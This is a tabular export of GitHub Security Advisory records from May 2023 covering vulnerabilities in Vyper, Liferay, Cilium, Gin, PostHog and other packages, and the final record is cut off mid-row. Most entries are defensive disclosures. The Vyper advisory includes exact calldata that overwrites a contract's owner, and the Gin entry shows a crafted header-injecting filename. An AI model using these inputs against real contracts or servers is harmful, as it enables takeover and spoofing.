schema_version
stringclasses 1
value | id
stringlengths 19
19
| modified
stringlengths 20
20
| published
stringlengths 20
20
| withdrawn
stringlengths 20
20
⌀ | aliases
stringlengths 2
20
| summary
stringlengths 20
140
| details
stringlengths 56
37.2k
| severity
stringlengths 2
92
| affected
stringlengths 88
7.07k
| references
stringlengths 139
4.72k
| database_specific
stringlengths 131
185
|
|---|---|---|---|---|---|---|---|---|---|---|---|
1.4.0
|
GHSA-5gjq-5339-x5cv
|
2023-05-17T03:40:58Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-2196']
|
Jenkins Code Dx Plugin missing permission checks
|
Jenkins Code Dx Plugin 3.1.0 and earlier does not perform a permission check in a method implementing form validation.
This allows attackers with Item/Read permission to check for the existence of an attacker-specified file path on an agent file system.
Code Dx Plugin 4.0.0 requires Item/Configure permission for this form validation method and ensures that only files located within the workspace can be checked.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:codedx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2196'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3145'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:40:58Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-mgv8-gggw-mrg6
|
2023-06-06T17:00:54Z
|
2023-05-05T22:22:23Z
| null |
['CVE-2023-30837']
|
vyper vulnerable to storage allocator overflow
|
### Impact
The storage allocator does not guard against allocation overflows. This can result in vulnerabilities like the following:
```vyper
owner: public(address)
take_up_some_space: public(uint256[10])
buffer: public(uint256[max_value(uint256)])
@external
def initialize():
self.owner = msg.sender
@external
def foo(idx: uint256, data: uint256):
self.buffer[idx] = data
```
Per @toonvanhove, "An attacker can overwrite the owner variable by calling this contract with calldata: `0x04bc52f8 fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff` (spaces inserted for readability)
`0x04bc52f8` is the selector for `foo(uint256, uint256)`, and the last argument `fff...fff` is the new value for the owner variable."
### Patches
patched in 0bb7203b584e771b23536ba065a6efda457161bb
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
### References
_Are there any links users can visit to find out more?_
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.8'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-mgv8-gggw-mrg6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30837'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/commit/0bb7203b584e771b23536ba065a6efda457161bb'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2023-76.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]
|
{'cwe_ids': ['CWE-789'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T22:22:23Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-ph9x-4vc9-m39g
|
2023-06-05T21:16:32Z
|
2023-05-12T20:21:00Z
| null |
['CVE-2023-32059']
|
Vyper vulnerable to incorrect ordering of arguments for kwargs passed to internal calls
|
### Impact
Internal calls to internal functions with more than 1 default argument are compiled incorrectly. Depending on the number of arguments
provided in the call, the defaults are added not right-to-left, but left-to-right. If the types are incompatible,
typechecking is bypassed. In the `bar()` function in the following code, `self.foo(13)` is compiled to
`self.foo(13,12)` instead of `self.foo(13,1337)`.
```vyper
@internal
def foo(a:uint256 = 12, b:uint256 = 1337):
pass
@internal
def bar():
self.foo(13)
```
note that at the time of publication, the ability to pass kwargs to internal functions is an undocumented feature that does not seem to be widely used.
### Patches
patched in c3e68c302aa6e1429946473769dd1232145822ac
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
### References
_Are there any links users can visit to find out more?_
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.8'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-ph9x-4vc9-m39g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32059'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/commit/c3e68c302aa6e1429946473769dd1232145822ac'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2023-79.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]
|
{'cwe_ids': ['CWE-683'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:21:00Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-8vw3-vxmj-h43w
|
2023-06-06T17:21:39Z
|
2023-05-27T06:30:41Z
| null |
['CVE-2023-26129']
|
bwm-ng vulnerable to command injection
|
All versions of the package bwm-ng are vulnerable to Command Injection due to improper input sanitization in the 'check' function in the bwm-ng.js file.
**Note:**
To execute the code snippet and potentially exploit the vulnerability, the attacker needs to have the ability to run Node.js code within the target environment. This typically requires some level of access to the system or application hosting the Node.js environment.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'bwm-ng'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26129'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-BWMNG-3175876'}]
|
{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-30T20:07:24Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-jqvr-j2vg-gjrv
|
2023-06-13T23:50:12Z
|
2023-05-30T06:30:25Z
| null |
['CVE-2023-34205']
|
Signature validation bypass in github.com/moov-io/signedxml
|
In Moov signedxml through 1.0.0, parsing the raw XML (as received) can result in different output than parsing the canonicalized XML. Thus, signature validation can be bypassed via a Signature Wrapping attack (aka XSW).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/moov-io/signedxml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34205'}, {'type': 'WEB', 'url': 'https://github.com/moov-io/signedxml/issues/23'}, {'type': 'WEB', 'url': 'https://github.com/moov-io/signedxml/pull/25'}, {'type': 'PACKAGE', 'url': 'https://github.com/moov-io/signedxml'}, {'type': 'WEB', 'url': 'https://github.com/moov-io/signedxml/releases/tag/v1.1.0'}]
|
{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:39:24Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-pjfj-qvqw-3f6v
|
2023-05-09T18:49:23Z
|
2023-05-01T15:30:26Z
| null |
['CVE-2022-45801']
|
Apache StreamPark LDAP Injection vulnerability
|
Apache StreamPark versions 1.0.0 to 2.0.0 have an LDAP injection vulnerability. LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection. LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree. This risk may only occur when the user logs in with ldap, and the user name and password login will not be affected, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.streampark:streampark'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-45801'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/incubator-streampark'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/xbkwwpkp3n2rs2wcxg8l26mhsftxwwr9'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T22:32:07Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-53mw-69qx-q4fc
|
2023-05-24T18:04:23Z
|
2023-05-24T15:30:27Z
| null |
['CVE-2023-33939']
|
Cross-site scripting in Liferay Portal
|
Cross-site scripting (XSS) vulnerability in the Modified Facet widget in Liferay Portal 7.1.0 through 7.4.3.12, and Liferay DXP 7.1 before fix pack 27, 7.2 before fix pack 18, 7.3 before update 4, and 7.4 before update 9 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a facet label.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.1.0'}, {'fixed': '7.4.3.13'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33939'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33939'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T18:04:23Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2h44-x2wx-49f4
|
2023-06-02T23:57:03Z
|
2023-05-22T20:33:15Z
| null |
['CVE-2023-30851']
|
Potential HTTP policy bypass when using header rules in Cilium
|
### Impact
This issue only impacts users who:
- Have a HTTP policy that applies to multiple `toEndpoints` AND
- Have an allow-all rule in place that affects only one of those endpoints
In such cases, a wildcard rule will be appended to the set of HTTP rules, which could cause bypass of HTTP policies.
### Patches
This issue has been patched in Cilium 1.11.16, 1.12.9, and 1.13.2.
### Workarounds
Rewrite HTTP rules for each endpoint separately. For example, if the initial rule looks like:
```
egress:
- toEndpoints:
- matchLabels:
k8s:kind: echo
- matchLabels:
k8s:kind: example
toPorts:
- ports:
- port: "8080"
protocol: TCP
rules:
http:
- method: "GET"
```
It should be rewritten to:
```
egress:
- toEndpoints:
- matchLabels:
k8s:kind: echo
toPorts:
- ports:
- port: "8080"
protocol: TCP
rules:
http:
- method: "GET"
- toEndpoints:
- matchLabels:
k8s:kind: example
toPorts:
- ports:
- port: "8080"
protocol: TCP
rules:
http:
- method: "GET"
```
### Acknowledgements
The Cilium community has worked together with members of Isovalent to prepare these mitigations. Special thanks to @jrajahalme for investigating and fixing the issue.
### For more information
If you have any questions or comments about this advisory, please reach out on [Slack](https://docs.cilium.io/en/latest/community/community/#slack).
As usual, if you think you found a related vulnerability, we strongly encourage you to report security vulnerabilities to our private security mailing list: [security@cilium.io](mailto:security@cilium.io) - first, before disclosing them in any public forums. This is a private mailing list where only members of the Cilium internal security team are subscribed to, and is treated as top priority.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.16'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/cilium/cilium/security/advisories/GHSA-2h44-x2wx-49f4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30851'}, {'type': 'PACKAGE', 'url': 'https://github.com/cilium/cilium'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.11.16'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.12.9'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.13.2'}]
|
{'cwe_ids': ['CWE-693'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-22T20:33:15Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2c4m-59x9-fr2g
|
2023-06-16T17:57:38Z
|
2023-05-12T20:19:25Z
| null |
['CVE-2023-29401']
|
Gin Web Framework does not properly sanitize filename parameter of Context.FileAttachment function
|
The filename parameter of the Context.FileAttachment function is not properly sanitized. A maliciously crafted filename can cause the Content-Disposition header to be sent with an unexpected filename value or otherwise modify the Content-Disposition header. For example, a filename of "setup.bat";x=.txt" will be sent as a file named "setup.bat".
If the FileAttachment function is called with names provided by an untrusted source, this may permit an attacker to cause a file to be served with a name different than provided. Maliciously crafted attachment file name can modify the Content-Disposition header.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/gin-gonic/gin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.1-0.20190301021747-ccb9e902956d'}, {'fixed': '1.9.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29401'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/issues/3555'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/3556'}, {'type': 'PACKAGE', 'url': 'https://github.com/gin-gonic/gin'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/releases/tag/v1.9.1'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1737'}]
|
{'cwe_ids': ['CWE-494'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:19:25Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-8775-5hwv-wr6v
|
2023-05-29T16:13:02Z
|
2023-05-22T20:35:03Z
| null |
['CVE-2023-32325']
|
Potential for cross-site scripting in PostHog-js
|
### Impact
Potential for cross-site scripting in `posthog-js`.
### Patches
The problem has been patched in `posthog-js` version 1.57.2.
### Workarounds
- This isn't an issue for sites that have a Content Security Policy in place.
- Using the HTML tracking snippet on PostHog Cloud always guarantees the latest version of the library – in that case no action is required to upgrade to the patched version.
### References
We will publish details of the vulnerability in 30 days as per our [security policy](https://posthog.com/handbook/company/security#policies).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'posthog-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.57.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/PostHog/posthog-js/security/advisories/GHSA-8775-5hwv-wr6v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32325'}, {'type': 'WEB', 'url': 'https://github.com/PostHog/posthog-js/pull/630'}, {'type': 'WEB', 'url': 'https://github.com/PostHog/posthog-js/commit/67e07eb8bb271a3a6f4aa251382e4d25abb385a0'}, {'type': 'PACKAGE', 'url': 'https://github.com/PostHog/posthog-js'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-22T20:35:03Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-g7vw-43xg-8m4h
|
2023-06-02T23:05:01Z
|
2023-05-24T18:30:26Z
| null |
['CVE-2023-33945']
|
SQL injection in Liferay Portal
|
SQL injection vulnerability in the upgrade process for SQL Server in Liferay Portal 7.3.1 through 7.4.3.17, and Liferay DXP 7.3 before update 6, and 7.4 before update 18 allows attackers to execute arbitrary SQL commands via the name of a database table's primary key index. This vulnerability is only exploitable when chained with other attacks. To exploit this vulnerability, the attacker must modify the database and wait for the application to be upgraded.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.3.1'}, {'fixed': '7.4.3.18'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33945'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33945'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T21:52:40Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-293v-5329-36wp
|
2023-05-15T13:42:38Z
|
2023-05-08T15:30:18Z
| null |
['CVE-2020-22755']
|
MCMS vulnerable to arbitrary code execution via crafted thumbnail
|
File upload vulnerability in MCMS 5.0 allows attackers to execute arbitrary code via a crafted thumbnail. A different vulnerability than CVE-2022-31943.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'net.mingsoft:ms-mcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-22755'}, {'type': 'WEB', 'url': 'https://github.com/ming-soft/MCMS/issues/42'}, {'type': 'PACKAGE', 'url': 'https://github.com/ming-soft/MCMS'}]
|
{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:34:22Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-q3j6-22wf-3jh9
|
2023-05-11T20:39:55Z
|
2023-05-11T20:39:55Z
| null |
[]
|
github.com/ipfs/go-bitswap vulnerable to DOS unbounded persistent memory leak
|
This package has been moved to [`github.com/ipfs/boxo/bitswap`](https://pkg.go.dev/github.com/ipfs/boxo/bitswap), this vulnerability is tracked there: https://github.com/ipfs/boxo/security/advisories/GHSA-m974-xj4j-7qv5 (`CVE-2023-25568`)
### Remediation
This is a two step process:
1. Apply one of:
- (**recommended**) upgrade from `github.com/ipfs/go-bitswap` to `github.com/ipfs/boxo/bitswap`.
- If you are still using `github.com/ipfs/go-bitswap` and cannot upgrade to `boxo`, you can upgrade to `github.com/ipfs/go-bitswap@v0.12.0`, this will replace the `go-bitswap` implementation by stubs which points to `boxo`.
2. Open https://github.com/ipfs/boxo/security/advisories/GHSA-m974-xj4j-7qv5 and then follow `boxo`'s remediation section.
### Vulnerable symbols
- `>= v0.9.0; < v0.12.0`
- `github.com/ipfs/go-bitswap/server/internal/decision.(*Engine).MessageReceived`
- `github.com/ipfs/go-bitswap/server/internal/decision.(*Engine).NotifyNewBlocks`
- `github.com/ipfs/go-bitswap/server/internal/decision.(*Engine).findOrCreate`
- `github.com/ipfs/go-bitswap/server/internal/decision.(*Engine).PeerConnected`
- `v0.8.0`
- `github.com/ipfs/go-bitswap/internal/decision.(*Engine).MessageReceived`
- `github.com/ipfs/go-bitswap/internal/decision.(*Engine).NotifyNewBlocks`
- `github.com/ipfs/go-bitswap/internal/decision.(*Engine).findOrCreate`
- `github.com/ipfs/go-bitswap/internal/decision.(*Engine).PeerConnected`
- `< v0.8.0`
- `github.com/ipfs/go-bitswap/internal/decision.(*Engine).MessageReceived`
- `github.com/ipfs/go-bitswap/internal/decision.(*Engine).receiveBlocksFrom`
- `github.com/ipfs/go-bitswap/internal/decision.(*Engine).findOrCreate`
- `github.com/ipfs/go-bitswap/internal/decision.(*Engine).PeerConnected`
### Workarounds
If you are using the stubs at `github.com/ipfs/go-bitswap` and not taking advantage of the features provided by the server, refactoring your code to use the new split API will allows you to run in a client-only mode using: [`github.com/ipfs/go-bitswap/client`](https://pkg.go.dev/github.com/ipfs/go-bitswap/client).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-bitswap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/ipfs/boxo/security/advisories/GHSA-m974-xj4j-7qv5'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-bitswap/security/advisories/GHSA-q3j6-22wf-3jh9'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-libipfs/security/advisories/GHSA-m974-xj4j-7qv5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25568'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/boxo/commit/62cbac40b96f49e39cd7fedc77ee6b56adce4916'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/boxo/commit/9cb5cb54d40b57084d1221ba83b9e6bb3fcc3197'}, {'type': 'PACKAGE', 'url': 'https://github.com/ipfs/go-bitswap'}]
|
{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:39:55Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-pgfx-g6rc-8cjv
|
2023-06-19T16:50:37Z
|
2023-05-18T17:32:00Z
| null |
['CVE-2022-24668']
|
swift-nio-http2 vulnerable to denial of service via ALTSVC or ORIGIN frames
|
A program using swift-nio-http2 is vulnerable to a denial of service attack caused by a network peer sending ALTSVC or ORIGIN frames. This attack affects all swift-nio-http2 versions from 1.0.0 to 1.19.1. It is fixed in 1.19.2 and later releases.
This vulnerability is caused by a logical error after frame parsing but before frame handling. ORIGIN and ALTSVC frames are not currently supported by swift-nio-http2, and should be ignored. However, one code path that encounters them has a deliberate trap instead. This was left behind from the original development process and was never removed.
Sending an ALTSVC or ORIGIN frame does not require any special permission, so any HTTP/2 connection peer may send such a frame. For clients, this means any server to which they connect may launch this attack. For servers, anyone they allow to connect to them may launch such an attack.
The attack is low-effort: it takes very little resources to send one of these frames. The impact on availability is high: receiving the frame immediately crashes the server, dropping all in-flight connections and causing the service to need to restart. It is straightforward for an attacker to repeatedly send these frames, so attackers require very few resources to achieve a substantial denial of service.
The attack does not have any confidentiality or integrity risks in and of itself. This is a controlled, intentional crash. However, sudden process crashes can lead to violations of invariants in services, so it is possible that this attack can be used to trigger an error condition that has confidentiality or integrity risks.
The risk can be mitigated if untrusted peers can be prevented from communicating with the service. This mitigation is not available to many services.
The issue is fixed by rewriting the parsing code to correctly handle the condition. The issue was found by automated fuzzing by oss-fuzz.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-nio-http2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.19.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-http2/security/advisories/GHSA-pgfx-g6rc-8cjv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-24668'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-http2/commit/000ca94f9de92c95b9ac85d44600b7b0fe25a3e5'}, {'type': 'PACKAGE', 'url': 'https://github.com/apple/swift-nio-http2'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-http2/releases/tag/1.19.2'}]
|
{'cwe_ids': ['CWE-241'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-18T17:32:00Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-8j28-34qq-gmch
|
2023-05-15T20:51:20Z
|
2023-05-15T12:30:16Z
| null |
['CVE-2022-47937']
|
Apache Sling Commons JSON bundle vulnerable to Improper Input Validation
|
Improper input validation in the Apache Sling Commons JSON bundle allows an attacker to trigger unexpected errors by supplying specially-crafted input.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. The org.apache.sling.commons.json bundle has been deprecated as of March 2017 and should not be used anymore. Consumers are encouraged to consider the Apache Sling Commons Johnzon OSGi bundle provided by the Apache Sling project, but may of course use other JSON libraries.
|
[]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sling:org.apache.sling.commons.json'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.20'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-47937'}, {'type': 'WEB', 'url': 'https://github.com/apache/sling-org-apache-sling-commons-johnzon'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SLING-6536'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/sws7z50x47gv0c38q4kx6ktqrvrrg1pm'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/05/15/2'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-15T20:51:20Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-j4mx-98hw-6rv6
|
2023-05-09T18:48:20Z
|
2023-05-05T23:13:02Z
| null |
['CVE-2023-31144']
|
craftcms/cms vulnerable to cross site scripting in RSS feed widget
|
A malformed title in the feed widget of craftcms/cms can deliver an XSS payload. This has been resolved in [this commit](https://github.com/craftcms/cms/commit/52bd161614620edbab2d24d078ca9ebca2528442).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.8.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.8.3'}}, {'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.4.3'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-j4mx-98hw-6rv6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31144'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/52bd161614620edbab2d24d078ca9ebca2528442'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/e2f7e7b7d86a0afa54ce855375d13c7760670764'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T23:13:02Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7gm3-mwjw-j53w
|
2023-05-30T21:57:10Z
|
2023-05-23T03:30:16Z
| null |
['CVE-2023-31826']
|
Command injection in nevado-jms
|
Skyscreamer Open Source Nevado JMS v1.3.2 does not perform security checks when receiving messages. This allows attackers to execute arbitrary commands via supplying crafted data.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.skyscreamer:nevado-jms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.2'}]}]}]
|
